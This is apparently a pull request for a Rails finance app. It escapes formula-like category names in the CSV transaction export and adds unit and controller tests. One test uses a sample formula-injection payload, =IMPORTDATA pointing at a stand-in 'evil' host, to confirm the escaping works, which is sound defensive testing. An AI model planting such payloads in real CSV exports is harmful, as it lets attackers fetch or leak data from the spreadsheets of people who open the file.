### PR TITLE
fix(reports): escape formula prefixes in CSV category export

### DIFF
--- a/app/controllers/reports_controller.rb
+++ b/app/controllers/reports_controller.rb
@@ -770,7 +770,7 @@ class ReportsController < ApplicationController
           csv << [ "INCOME" ] + Array.new(month_headers.length + 1, "")
 
           @export_data[:income].each do |category_data|
-            row = [ category_data[:category] ]
+            row = [ CsvFormulaSanitizer.escape(category_data[:category]) ]
 
             # Add amounts for each month
             @export_data[:months].each do |month|
@@ -802,7 +802,7 @@ class ReportsController < ApplicationController
           csv << [ "EXPENSES" ] + Array.new(month_headers.length + 1, "")
 
           @export_data[:expenses].each do |category_data|
-            row = [ category_data[:category] ]
+            row = [ CsvFormulaSanitizer.escape(category_data[:category]) ]
 
             # Add amounts for each month
             @export_data[:months].each do |month|

--- a/app/lib/csv_formula_sanitizer.rb
+++ b/app/lib/csv_formula_sanitizer.rb
@@ -1,7 +1,7 @@
 # frozen_string_literal: true
 
 module CsvFormulaSanitizer
-  FORMULA_PREFIX = /\A[=+\-@]/
+  FORMULA_PREFIX = /\A[=+\-@\t\r]/
 
   module_function
 

--- a/app/lib/csv_formula_sanitizer.rb
+++ b/app/lib/csv_formula_sanitizer.rb
@@ -1,0 +1,14 @@
+# frozen_string_literal: true
+
+module CsvFormulaSanitizer
+  FORMULA_PREFIX = /\A[=+\-@]/
+
+  module_function
+
+  def escape(value)
+    string = value.to_s
+    return string unless string.match?(FORMULA_PREFIX)
+
+    "'#{string}"
+  end
+end

--- a/test/controllers/reports_controller_test.rb
+++ b/test/controllers/reports_controller_test.rb
@@ -224,6 +224,31 @@ class ReportsControllerTest < ActionDispatch::IntegrationTest
     assert_match /Invalid or expired API key/, @response.body
   end
 
+  test "export neutralizes formula injection in category names" do
+    category = @family.categories.create!(
+      name: "=1+1",
+      color: "#737373",
+      lucide_icon: "circle"
+    )
+    create_transaction(
+      account: @family.accounts.first,
+      name: "Formula category spend",
+      amount: -10,
+      category: category
+    )
+
+    get export_transactions_reports_path(
+      format: :csv,
+      period_type: :ytd,
+      start_date: Date.current.beginning_of_year,
+      end_date: Date.current
+    )
+
+    assert_response :ok
+    assert_match(/'=1\+1/, @response.body)
+    refute_match(/\n=1\+1,/, @response.body)
+  end
+
   test "export transactions without API key uses session auth" do
     # Should use normal session-based authentication
     # The setup already signs in @user = users(:family_admin)

--- a/test/lib/csv_formula_sanitizer_test.rb
+++ b/test/lib/csv_formula_sanitizer_test.rb
@@ -1,0 +1,16 @@
+# frozen_string_literal: true
+
+require "test_helper"
+
+class CsvFormulaSanitizerTest < ActiveSupport::TestCase
+  test "prefixes spreadsheet formula characters" do
+    assert_equal "'=1+1", CsvFormulaSanitizer.escape("=1+1")
+    assert_equal "'+cmd", CsvFormulaSanitizer.escape("+cmd")
+    assert_equal "'-10", CsvFormulaSanitizer.escape("-10")
+    assert_equal "'@sum", CsvFormulaSanitizer.escape("@sum")
+  end
+
+  test "leaves safe labels unchanged" do
+    assert_equal "Groceries", CsvFormulaSanitizer.escape("Groceries")
+  end
+end

--- a/test/lib/csv_formula_sanitizer_test.rb
+++ b/test/lib/csv_formula_sanitizer_test.rb
@@ -8,6 +8,8 @@ class CsvFormulaSanitizerTest < ActiveSupport::TestCase
     assert_equal "'+cmd", CsvFormulaSanitizer.escape("+cmd")
     assert_equal "'-10", CsvFormulaSanitizer.escape("-10")
     assert_equal "'@sum", CsvFormulaSanitizer.escape("@sum")
+    assert_equal "'\t=IMPORTDATA(\"http://evil\")", CsvFormulaSanitizer.escape("\t=IMPORTDATA(\"http://evil\")")
+    assert_equal "'\r=1+1", CsvFormulaSanitizer.escape("\r=1+1")
   end
 
   test "leaves safe labels unchanged" do


### PR DESCRIPTION
## Summary

Closes #2053. Escape user-controlled category names in the reports transaction CSV export so spreadsheet apps treat formula-like labels as text.

## Changes

- Add `CsvFormulaSanitizer.escape` for values starting with `=`, `+`, `-`, or `@`.
- Apply sanitization to income and expense category columns in `generate_transactions_csv`.
- Add unit and controller tests.

## Test plan

- [ ] `bin/rails test test/lib/csv_formula_sanitizer_test.rb`
- [ ] `bin/rails test test/controllers/reports_controller_test.rb`


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **Bug Fixes**
  * CSV transaction exports now neutralize category names that begin with spreadsheet-formula characters (such as =, +, -, @) and other tricky prefixes (tab, carriage return), so they display safely in external spreadsheet apps.

* **Tests**
  * Added tests to verify CSV export sanitization and ensure category names with leading formula-like characters are neutralized.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->